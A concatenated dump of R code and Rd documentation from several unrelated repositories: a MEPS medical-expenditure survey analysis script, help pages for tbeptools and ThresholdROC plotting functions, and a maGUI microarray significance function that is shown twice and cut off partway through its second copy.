mutate_at(vars(starts_with("AGE")),funs(replace(., .< 0, NA))) %>%
mutate(AGELAST = coalesce(AGE08X, AGE42X, AGE31X))
FYC$ind = 1
# Age groups
# To compute for all age groups, replace 'agegrps' in the 'svyby' function with 'agegrps_v2X' or 'agegrps_v3X'
FYC <- FYC %>%
mutate(agegrps = cut(AGELAST,
breaks = c(-1, 4.5, 17.5, 44.5, 64.5, Inf),
labels = c("Under 5","5-17","18-44","45-64","65+"))) %>%
mutate(agegrps_v2X = cut(AGELAST,
breaks = c(-1, 17.5 ,64.5, Inf),
labels = c("Under 18","18-64","65+"))) %>%
mutate(agegrps_v3X = cut(AGELAST,
breaks = c(-1, 4.5, 6.5, 12.5, 17.5, 18.5, 24.5, 29.5, 34.5, 44.5, 54.5, 64.5, Inf),
labels = c("Under 5", "5-6", "7-12", "13-17", "18", "19-24", "25-29",
"30-34", "35-44", "45-54", "55-64", "65+")))
# Keep only needed variables from FYC
FYCsub <- FYC %>% select(agegrps,ind, DUPERSID, PERWT08F, VARSTR, VARPSU)
# Load event files
RX <- read.xport('C:/MEPS/h118a.ssp')
DVT <- read.xport('C:/MEPS/h118b.ssp')
IPT <- read.xport('C:/MEPS/h118d.ssp')
ERT <- read.xport('C:/MEPS/h118e.ssp')
OPT <- read.xport('C:/MEPS/h118f.ssp')
OBV <- read.xport('C:/MEPS/h118g.ssp')
HHT <- read.xport('C:/MEPS/h118h.ssp')
# Define sub-levels for office-based and outpatient
OBV <- OBV %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OBD', '2' = 'OBO'))
OPT <- OPT %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OPY', '2' = 'OPZ'))
# Sum RX purchases for each event
RX <- RX %>%
rename(EVNTIDX = LINKIDX) %>%
group_by(DUPERSID,EVNTIDX) %>%
summarise_at(vars(RXSF08X:RXXP08X),sum) %>%
ungroup
# Stack events (dental visits and other medical not collected for events)
stacked_events <- stack_events(RX, IPT, ERT, OPT, OBV, HHT, keep.vars = c('SEEDOC','event_v2X'))
stacked_events <- stacked_events %>%
mutate(event = data,
PR08X = PV08X + TR08X,
OZ08X = OF08X + SL08X + OT08X + OR08X + OU08X + WC08X + VA08X)
# Read in event-condition linking file
clink1 = read.xport('C:/MEPS/h118if1.ssp') %>%
select(DUPERSID,CONDIDX,EVNTIDX)
# Read in conditions file and merge with condition_codes, link file
cond <- read.xport('C:/MEPS/h120.ssp') %>%
select(DUPERSID, CONDIDX, CCCODEX) %>%
mutate(CCS_Codes = as.numeric(as.character(CCCODEX))) %>%
left_join(condition_codes, by = "CCS_Codes") %>%
full_join(clink1, by = c("DUPERSID", "CONDIDX")) %>%
distinct(DUPERSID, EVNTIDX, Condition, .keep_all=T)
# Merge events with conditions-link file and FYCsub
all_events <- full_join(stacked_events, cond, by=c("DUPERSID","EVNTIDX")) %>%
filter(!is.na(Condition),XP08X >= 0) %>%
mutate(count = 1) %>%
full_join(FYCsub, by = "DUPERSID")
# Sum by person, condition, across event
all_pers <- all_events %>%
group_by(agegrps,ind, DUPERSID, VARSTR, VARPSU, PERWT08F, Condition, count) %>%
summarize_at(vars(SF08X, PR08X, MR08X, MD08X, OZ08X, XP08X),sum) %>% ungroup
PERSdsgn <- svydesign(
id = ~VARPSU,
strata = ~VARSTR,
weights = ~PERWT08F,
data = all_pers,
nest = TRUE)
svyby(~XP08X, by = ~Condition + agegrps, FUN = svymean, design = PERSdsgn)
| /_check/test_code/cond/r_codes/meanEXP_Condition_agegrps_2008.R | permissive | HHS-AHRQ/MEPS-summary-tables | R | false | false | 3,875 | r | # Install and load packages
package_names <- c("survey","dplyr","foreign","devtools")
lapply(package_names, function(x) if(!x %in% installed.packages()) install.packages(x))
lapply(package_names, require, character.only=T)
install_github("e-mitchell/meps_r_pkg/MEPS")
library(MEPS)
options(survey.lonely.psu="adjust")
# Load FYC file
FYC <- read.xport('C:/MEPS/h121.ssp');
year <- 2008
if(year <= 2001) FYC <- FYC %>% mutate(VARPSU = VARPSU08, VARSTR=VARSTR08)
if(year <= 1998) FYC <- FYC %>% rename(PERWT08F = WTDPER08)
if(year == 1996) FYC <- FYC %>% mutate(AGE42X = AGE2X, AGE31X = AGE1X)
FYC <- FYC %>%
mutate_at(vars(starts_with("AGE")),funs(replace(., .< 0, NA))) %>%
mutate(AGELAST = coalesce(AGE08X, AGE42X, AGE31X))
FYC$ind = 1
# Age groups
# To compute for all age groups, replace 'agegrps' in the 'svyby' function with 'agegrps_v2X' or 'agegrps_v3X'
FYC <- FYC %>%
mutate(agegrps = cut(AGELAST,
breaks = c(-1, 4.5, 17.5, 44.5, 64.5, Inf),
labels = c("Under 5","5-17","18-44","45-64","65+"))) %>%
mutate(agegrps_v2X = cut(AGELAST,
breaks = c(-1, 17.5 ,64.5, Inf),
labels = c("Under 18","18-64","65+"))) %>%
mutate(agegrps_v3X = cut(AGELAST,
breaks = c(-1, 4.5, 6.5, 12.5, 17.5, 18.5, 24.5, 29.5, 34.5, 44.5, 54.5, 64.5, Inf),
labels = c("Under 5", "5-6", "7-12", "13-17", "18", "19-24", "25-29",
"30-34", "35-44", "45-54", "55-64", "65+")))
# Keep only needed variables from FYC
FYCsub <- FYC %>% select(agegrps,ind, DUPERSID, PERWT08F, VARSTR, VARPSU)
# Load event files
RX <- read.xport('C:/MEPS/h118a.ssp')
DVT <- read.xport('C:/MEPS/h118b.ssp')
IPT <- read.xport('C:/MEPS/h118d.ssp')
ERT <- read.xport('C:/MEPS/h118e.ssp')
OPT <- read.xport('C:/MEPS/h118f.ssp')
OBV <- read.xport('C:/MEPS/h118g.ssp')
HHT <- read.xport('C:/MEPS/h118h.ssp')
# Define sub-levels for office-based and outpatient
OBV <- OBV %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OBD', '2' = 'OBO'))
OPT <- OPT %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OPY', '2' = 'OPZ'))
# Sum RX purchases for each event
RX <- RX %>%
rename(EVNTIDX = LINKIDX) %>%
group_by(DUPERSID,EVNTIDX) %>%
summarise_at(vars(RXSF08X:RXXP08X),sum) %>%
ungroup
# Stack events (dental visits and other medical not collected for events)
stacked_events <- stack_events(RX, IPT, ERT, OPT, OBV, HHT, keep.vars = c('SEEDOC','event_v2X'))
stacked_events <- stacked_events %>%
mutate(event = data,
PR08X = PV08X + TR08X,
OZ08X = OF08X + SL08X + OT08X + OR08X + OU08X + WC08X + VA08X)
# Read in event-condition linking file
clink1 = read.xport('C:/MEPS/h118if1.ssp') %>%
select(DUPERSID,CONDIDX,EVNTIDX)
# Read in conditions file and merge with condition_codes, link file
cond <- read.xport('C:/MEPS/h120.ssp') %>%
select(DUPERSID, CONDIDX, CCCODEX) %>%
mutate(CCS_Codes = as.numeric(as.character(CCCODEX))) %>%
left_join(condition_codes, by = "CCS_Codes") %>%
full_join(clink1, by = c("DUPERSID", "CONDIDX")) %>%
distinct(DUPERSID, EVNTIDX, Condition, .keep_all=T)
# Merge events with conditions-link file and FYCsub
all_events <- full_join(stacked_events, cond, by=c("DUPERSID","EVNTIDX")) %>%
filter(!is.na(Condition),XP08X >= 0) %>%
mutate(count = 1) %>%
full_join(FYCsub, by = "DUPERSID")
# Sum by person, condition, across event
all_pers <- all_events %>%
group_by(agegrps,ind, DUPERSID, VARSTR, VARPSU, PERWT08F, Condition, count) %>%
summarize_at(vars(SF08X, PR08X, MR08X, MD08X, OZ08X, XP08X),sum) %>% ungroup
PERSdsgn <- svydesign(
id = ~VARPSU,
strata = ~VARSTR,
weights = ~PERWT08F,
data = all_pers,
nest = TRUE)
svyby(~XP08X, by = ~Condition + agegrps, FUN = svymean, design = PERSdsgn)
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/show_segplotly.R
\name{show_segplotly}
\alias{show_segplotly}
\title{Plot chlorophyll and secchi data together with matrix outcomes}
\usage{
show_segplotly(
epcdata,
bay_segment = c("OTB", "HB", "MTB", "LTB"),
yrrng = c(1975, 2019),
family = NULL,
partialyr = FALSE
)
}
\arguments{
\item{epcdata}{data frame of epc data returned by \code{\link{read_importwq}}}
\item{bay_segment}{chr string for the bay segment, one of "OTB", "HB", "MTB", "LTB"}
\item{yrrng}{numeric for year range to plot}
\item{family}{optional chr string indicating font family for text labels}
\item{partialyr}{logical indicating if incomplete annual data for the most recent year are approximated by five year monthly averages for each parameter}
}
\value{
An interactive plotly object
}
\description{
Plot chlorophyll and secchi data together with matrix outcomes
}
\details{
This function combines outputs from \code{\link{show_thrplot}} and \code{\link{show_segmatrix}} for a selected bay segment. The plot is interactive and can be zoomed by dragging the mouse pointer over a section of the plot. Information about each cell or value can be seen by hovering over a location in the plot.
}
\examples{
show_segplotly(epcdata)
}
\concept{show}
| /man/show_segplotly.Rd | permissive | mikewessel/tbeptools | R | false | true | 1,309 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/show_segplotly.R
\name{show_segplotly}
\alias{show_segplotly}
\title{Plot chlorophyll and secchi data together with matrix outcomes}
\usage{
show_segplotly(
epcdata,
bay_segment = c("OTB", "HB", "MTB", "LTB"),
yrrng = c(1975, 2019),
family = NULL,
partialyr = FALSE
)
}
\arguments{
\item{epcdata}{data frame of epc data returned by \code{\link{read_importwq}}}
\item{bay_segment}{chr string for the bay segment, one of "OTB", "HB", "MTB", "LTB"}
\item{yrrng}{numeric for year range to plot}
\item{family}{optional chr string indicating font family for text labels}
\item{partialyr}{logical indicating if incomplete annual data for the most recent year are approximated by five year monthly averages for each parameter}
}
\value{
An interactive plotly object
}
\description{
Plot chlorophyll and secchi data together with matrix outcomes
}
\details{
This function combines outputs from \code{\link{show_thrplot}} and \code{\link{show_segmatrix}} for a selected bay segment. The plot is interactive and can be zoomed by dragging the mouse pointer over a section of the plot. Information about each cell or value can be seen by hovering over a location in the plot.
}
\examples{
show_segplotly(epcdata)
}
\concept{show}
|
\name{lines.thres3}
\alias{lines.thres3}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
Add threshold lines to a plot (three-state setting)
}
\description{
The function includes vertical lines for the thresholds and confidence intervals in a plot created with \code{plot.thres3()}.
}
\usage{
\method{lines}{thres3}(x, ci = TRUE, which.boot = c("norm", "perc"),
col = 1, lty = c(1, 2), lwd = 1, \dots)
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{x}{
an object of class \code{thres3}.
}
\item{ci}{
should the confidence intervals be plotted? Default, \code{TRUE}. No confidence intervals will be plotted if \code{x} does not contain one (that is, \code{x$CI} is \code{NULL}).
}
\item{which.boot}{
in case \code{x} contains confidence intervals calculated by bootstrapping, which one should be printed? the user can choose between \code{"norm"} (based on normal distribution) or \code{"perc"} (based on percentiles). Default, \code{"norm"}. This argument is ignored if parametric confidence intervals were calculated.
}
\item{col}{
color for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{lty}{
a 2-dimensional vector containing:
\code{lty[1]}: line type for the thresholds
\code{lty[2]}: line type for the confidence intervals
Default, \code{c(1, 2)}. If \code{length(lty)} is not 2, \code{lty} will be recycled.
}
\item{lwd}{
line width for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{\dots}{
further arguments to be passed to \code{abline()}.
}
}
\value{
With a \code{plot.thres3} open, this function adds lines for the required threshold estimates.
}
\references{
Skaltsa K, Jover L, Fuster D, Carrasco JL. (2012). Optimum threshold estimation based on cost function in a multistate diagnostic setting. Statistics in Medicine, 31:1098-1109.
}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
\code{\link{thres3}}, \code{\link{plot.thres3}}
}
\examples{
set.seed(1234)
n <- 100
k1 <- rlnorm(n)
k2 <- rnorm(n, 3, 1)
k3 <- rnorm(n, 5, 1)
rho <- c(1/3, 1/3, 1/3)
# assuming trinormality
start <- c(mean(k1), mean(k3))
thres1 <- thres3(k1, k2, k3, rho, dist1="norm", dist2="norm",
dist3="norm", start=start, ci.method="param")
# not assuming trinormality
start2 <- c(0.05, 0.6, 0.5, 0.95)
set.seed(2014)
thres2 <- thres3(k1, k2, k3, rho, start=start2, B=1000,
ci.method="boot", dist1="lnorm", dist2="norm",
dist3="norm")
plot(thres2, leg.pos="topright", leg.cex=0.8, col=1:4)
lines(thres1, col=5)
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{threshold}
\keyword{plot}% __ONLY ONE__ keyword per line
| /man/lines-thres3.Rd | no_license | cran/ThresholdROC | R | false | false | 2,881 | rd | \name{lines.thres3}
\alias{lines.thres3}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
Add threshold lines to a plot (three-state setting)
}
\description{
The function includes vertical lines for the thresholds and confidence intervals in a plot created with \code{plot.thres3()}.
}
\usage{
\method{lines}{thres3}(x, ci = TRUE, which.boot = c("norm", "perc"),
col = 1, lty = c(1, 2), lwd = 1, \dots)
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{x}{
an object of class \code{thres3}.
}
\item{ci}{
should the confidence intervals be plotted? Default, \code{TRUE}. No confidence intervals will be plotted if \code{x} does not contain one (that is, \code{x$CI} is \code{NULL}).
}
\item{which.boot}{
in case \code{x} contains confidence intervals calculated by bootstrapping, which one should be printed? the user can choose between \code{"norm"} (based on normal distribution) or \code{"perc"} (based on percentiles). Default, \code{"norm"}. This argument is ignored if parametric confidence intervals were calculated.
}
\item{col}{
color for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{lty}{
a 2-dimensional vector containing:
\code{lty[1]}: line type for the thresholds
\code{lty[2]}: line type for the confidence intervals
Default, \code{c(1, 2)}. If \code{length(lty)} is not 2, \code{lty} will be recycled.
}
\item{lwd}{
line width for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{\dots}{
further arguments to be passed to \code{abline()}.
}
}
\value{
With a \code{plot.thres3} open, this function adds lines for the required threshold estimates.
}
\references{
Skaltsa K, Jover L, Fuster D, Carrasco JL. (2012). Optimum threshold estimation based on cost function in a multistate diagnostic setting. Statistics in Medicine, 31:1098-1109.
}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
\code{\link{thres3}}, \code{\link{plot.thres3}}
}
\examples{
set.seed(1234)
n <- 100
k1 <- rlnorm(n)
k2 <- rnorm(n, 3, 1)
k3 <- rnorm(n, 5, 1)
rho <- c(1/3, 1/3, 1/3)
# assuming trinormality
start <- c(mean(k1), mean(k3))
thres1 <- thres3(k1, k2, k3, rho, dist1="norm", dist2="norm",
dist3="norm", start=start, ci.method="param")
# not assuming trinormality
start2 <- c(0.05, 0.6, 0.5, 0.95)
set.seed(2014)
thres2 <- thres3(k1, k2, k3, rho, start=start2, B=1000,
ci.method="boot", dist1="lnorm", dist2="norm",
dist3="norm")
plot(thres2, leg.pos="topright", leg.cex=0.8, col=1:4)
lines(thres1, col=5)
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{threshold}
\keyword{plot}% __ONLY ONE__ keyword per line
|
stat_sign<-function(h,...){
try(({
dat2Affy.f<-dat2Affy.f;datAgOne2.f<-datAgOne2.f;datAgTwo2.f<-datAgTwo2.f;datIllBA2.f<-datIllBA2.f;
lumi_NQ.f<-lumi_NQ.f;data.matrix_Nimblegen2.f<-data.matrix_Nimblegen2.f;
data.matrixNorm.f<-data.matrixNorm.f;data.matrix_onlineNorm.f<-data.matrix_onlineNorm.f;
use.dat2Affy.m<-use.dat2Affy.m;use.datAgOne2.m<-use.datAgOne2.m;use.datAgTwo2.m<-use.datAgTwo2.m;
use.datIllBA2.m2<-use.datIllBA2.m2;use.lumi_NQ.m<-use.lumi_NQ.m;
use.data.matrix_Nimblegen2.m<-use.data.matrix_Nimblegen2.m;
use.data.matrixNorm.m<-use.data.matrixNorm.m;use.data.matrix_onlineNorm.m<-use.data.matrix_onlineNorm.m;l<-l;tree<-tree;
}),silent=TRUE)
aa=0;bb=0;cc=0;dd=0;ee=0;ff=0;gg=0;hh=0;
try(({
if(exists("dat2Affy.f"))aa=length(dat2Affy.f)
if(exists("datAgOne2.f"))bb=length(datAgOne2.f)
if(exists("datAgTwo2.f"))cc=length(datAgTwo2.f)
if(exists("datIllBA2.f"))dd=length(datIllBA2.f)
if(exists("lumi_NQ.f"))ee=length(lumi_NQ.f)
if(exists("data.matrix_Nimblegen2.f"))ff=length(data.matrix_Nimblegen2.f)
if(exists("data.matrixNorm.f"))gg=length(data.matrixNorm.f)
if(exists("data.matrix_onlineNorm.f"))hh=length(data.matrix_onlineNorm.f)
}),silent=TRUE)
dat2Affy.s=NULL;datAgOne2.s=NULL;datAgTwo2.s=NULL;datIllBA2.s=NULL;lumi_NQ.s=NULL;data.matrix_Nimblegen2.s=NULL;
data.matrixNorm.s=NULL;data.matrix_onlineNorm.s=NULL;
ttx=NULL
rm(dat2Affy.s,datAgOne2.s,datAgTwo2.s,datIllBA2.s,lumi_NQ.s,data.matrix_Nimblegen2.s,
data.matrixNorm.s,data.matrix_onlineNorm.s,
ttx)
if(aa!=0){
err<-try(ttx<<-toptable(dat2Affy.f,coef=2,number=nrow(use.dat2Affy.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(dat2Affy.f,coef=3,number=nrow(use.dat2Affy.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(dat2Affy.f,coef=4,number=nrow(use.dat2Affy.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(dat2Affy.f,number=nrow(use.dat2Affy.m))
rn<-row.names(ttx)[ttx$P.Value<=0.01]
err<-try(dat2Affy.s<<-use.dat2Affy.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(dat2Affy.s<<-use.dat2Affy.m[as.numeric(rn),],silent=TRUE)
if(length(dat2Affy.s)!=0){
visible(g1_1)<-FALSE
l$Affymetrix$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(bb!=0){
err<-try(ttx<<-toptable(datAgOne2.f,coef=2,number=nrow(use.datAgOne2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgOne2.f,coef=3,number=nrow(use.datAgOne2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgOne2.f,coef=4,number=nrow(use.datAgOne2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(datAgOne2.f,number=nrow(use.datAgOne2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datAgOne2.s<<-use.datAgOne2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datAgOne2.s<<-use.datAgOne2.m[as.numeric(rn),],silent=TRUE)
if(length(datAgOne2.s)!=0){
visible(g1_1)<-FALSE
l$Agilent_OneColor$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(cc!=0){
err<-try(ttx<<-toptable(datAgTwo2.f,coef=2,number=nrow(use.datAgTwo2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgTwo2.f,coef=3,number=nrow(use.datAgTwo2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgTwo2.f,coef=4,number=nrow(use.datAgTwo2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(datAgTwo2.f,number=nrow(use.datAgTwo2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datAgTwo2.s<<-use.datAgTwo2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datAgTwo2.s<<-use.datAgTwo2.m[as.numeric(rn),],silent=TRUE)
if(length(datAgTwo2.s)!=0){
visible(g1_1)<-FALSE
l$Agilent_TwoColor$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(dd!=0){
err<-try(ttx<<-toptable(datIllBA2.f,coef=2,number=nrow(use.datIllBA2.m2)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datIllBA2.f,coef=3,number=nrow(use.datIllBA2.m2)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datIllBA2.f,coef=4,number=nrow(use.datIllBA2.m2)),silent=TRUE)
}
if(length(grep("Error",err))!=0)toptable(datIllBA2.f,number=nrow(use.datIllBA2.m2))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datIllBA2.s<<-use.datIllBA2.m2[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datIllBA2.s<<-use.datIllBA2.m2[as.numeric(rn),],silent=TRUE)
if(length(datIllBA2.s)!=0){
visible(g1_1)<-FALSE
l$Illumina_Beadarray$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(ee!=0){
err<-try(ttx<<-toptable(lumi_NQ.f,coef=2,number=nrow(use.lumi_NQ.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(lumi_NQ.f,coef=3,number=nrow(use.lumi_NQ.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(lumi_NQ.f,coef=4,number=nrow(use.lumi_NQ.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(lumi_NQ.f,number=nrow(use.lumi_NQ.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(lumi_NQ.s<<-use.lumi_NQ.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(lumi_NQ.s<<-use.lumi_NQ.m[as.numeric(rn),],silent=TRUE)
if(length(lumi_NQ.s)!=0){
visible(g1_1)<-FALSE
l$Illumina_Lumi$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(ff!=0){
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=2,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=3,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=4,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_Nimblegen2.f,number=nrow(use.data.matrix_Nimblegen2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrix_Nimblegen2.s)!=0){
visible(g1_1)<-FALSE
l$Nimblegen$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(gg!=0){
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=2,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=3,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=4,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrixNorm.f,number=nrow(use.data.matrixNorm.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrixNorm.s<<-use.data.matrixNorm.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrixNorm.s<<-use.data.matrixNorm.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrixNorm.s)!=0){
visible(g1_1)<-FALSE
l$Series_Matrix$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(hh!=0){
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=2,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=3,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=4,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_onlineNorm.f,number=nrow(use.data.matrix_onlineNorm.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrix_onlineNorm.s<<-use.data.matrixNorm.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrix_onlineNorm.s<<-use.data.matrixNorm.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrix_onlineNorm.s)!=0){
visible(g1_1)<-FALSE
l$Online_Data$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
}
| /maGUI/R/stat_sign.R | no_license | ingted/R-Examples | R | false | false | 8,810 | r | stat_sign<-function(h,...){
try(({
dat2Affy.f<-dat2Affy.f;datAgOne2.f<-datAgOne2.f;datAgTwo2.f<-datAgTwo2.f;datIllBA2.f<-datIllBA2.f;
lumi_NQ.f<-lumi_NQ.f;data.matrix_Nimblegen2.f<-data.matrix_Nimblegen2.f;
data.matrixNorm.f<-data.matrixNorm.f;data.matrix_onlineNorm.f<-data.matrix_onlineNorm.f;
use.dat2Affy.m<-use.dat2Affy.m;use.datAgOne2.m<-use.datAgOne2.m;use.datAgTwo2.m<-use.datAgTwo2.m;
use.datIllBA2.m2<-use.datIllBA2.m2;use.lumi_NQ.m<-use.lumi_NQ.m;
use.data.matrix_Nimblegen2.m<-use.data.matrix_Nimblegen2.m;
use.data.matrixNorm.m<-use.data.matrixNorm.m;use.data.matrix_onlineNorm.m<-use.data.matrix_onlineNorm.m;l<-l;tree<-tree;
}),silent=TRUE)
aa=0;bb=0;cc=0;dd=0;ee=0;ff=0;gg=0;hh=0;
try(({
if(exists("dat2Affy.f"))aa=length(dat2Affy.f)
if(exists("datAgOne2.f"))bb=length(datAgOne2.f)
if(exists("datAgTwo2.f"))cc=length(datAgTwo2.f)
if(exists("datIllBA2.f"))dd=length(datIllBA2.f)
if(exists("lumi_NQ.f"))ee=length(lumi_NQ.f)
if(exists("data.matrix_Nimblegen2.f"))ff=length(data.matrix_Nimblegen2.f)
if(exists("data.matrixNorm.f"))gg=length(data.matrixNorm.f)
if(exists("data.matrix_onlineNorm.f"))hh=length(data.matrix_onlineNorm.f)
}),silent=TRUE)
dat2Affy.s=NULL;datAgOne2.s=NULL;datAgTwo2.s=NULL;datIllBA2.s=NULL;lumi_NQ.s=NULL;data.matrix_Nimblegen2.s=NULL;
data.matrixNorm.s=NULL;data.matrix_onlineNorm.s=NULL;
ttx=NULL
rm(dat2Affy.s,datAgOne2.s,datAgTwo2.s,datIllBA2.s,lumi_NQ.s,data.matrix_Nimblegen2.s,
data.matrixNorm.s,data.matrix_onlineNorm.s,
ttx)
if(aa!=0){
err<-try(ttx<<-toptable(dat2Affy.f,coef=2,number=nrow(use.dat2Affy.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(dat2Affy.f,coef=3,number=nrow(use.dat2Affy.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(dat2Affy.f,coef=4,number=nrow(use.dat2Affy.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(dat2Affy.f,number=nrow(use.dat2Affy.m))
rn<-row.names(ttx)[ttx$P.Value<=0.01]
err<-try(dat2Affy.s<<-use.dat2Affy.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(dat2Affy.s<<-use.dat2Affy.m[as.numeric(rn),],silent=TRUE)
if(length(dat2Affy.s)!=0){
visible(g1_1)<-FALSE
l$Affymetrix$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(bb!=0){
err<-try(ttx<<-toptable(datAgOne2.f,coef=2,number=nrow(use.datAgOne2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgOne2.f,coef=3,number=nrow(use.datAgOne2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgOne2.f,coef=4,number=nrow(use.datAgOne2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(datAgOne2.f,number=nrow(use.datAgOne2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datAgOne2.s<<-use.datAgOne2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datAgOne2.s<<-use.datAgOne2.m[as.numeric(rn),],silent=TRUE)
if(length(datAgOne2.s)!=0){
visible(g1_1)<-FALSE
l$Agilent_OneColor$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
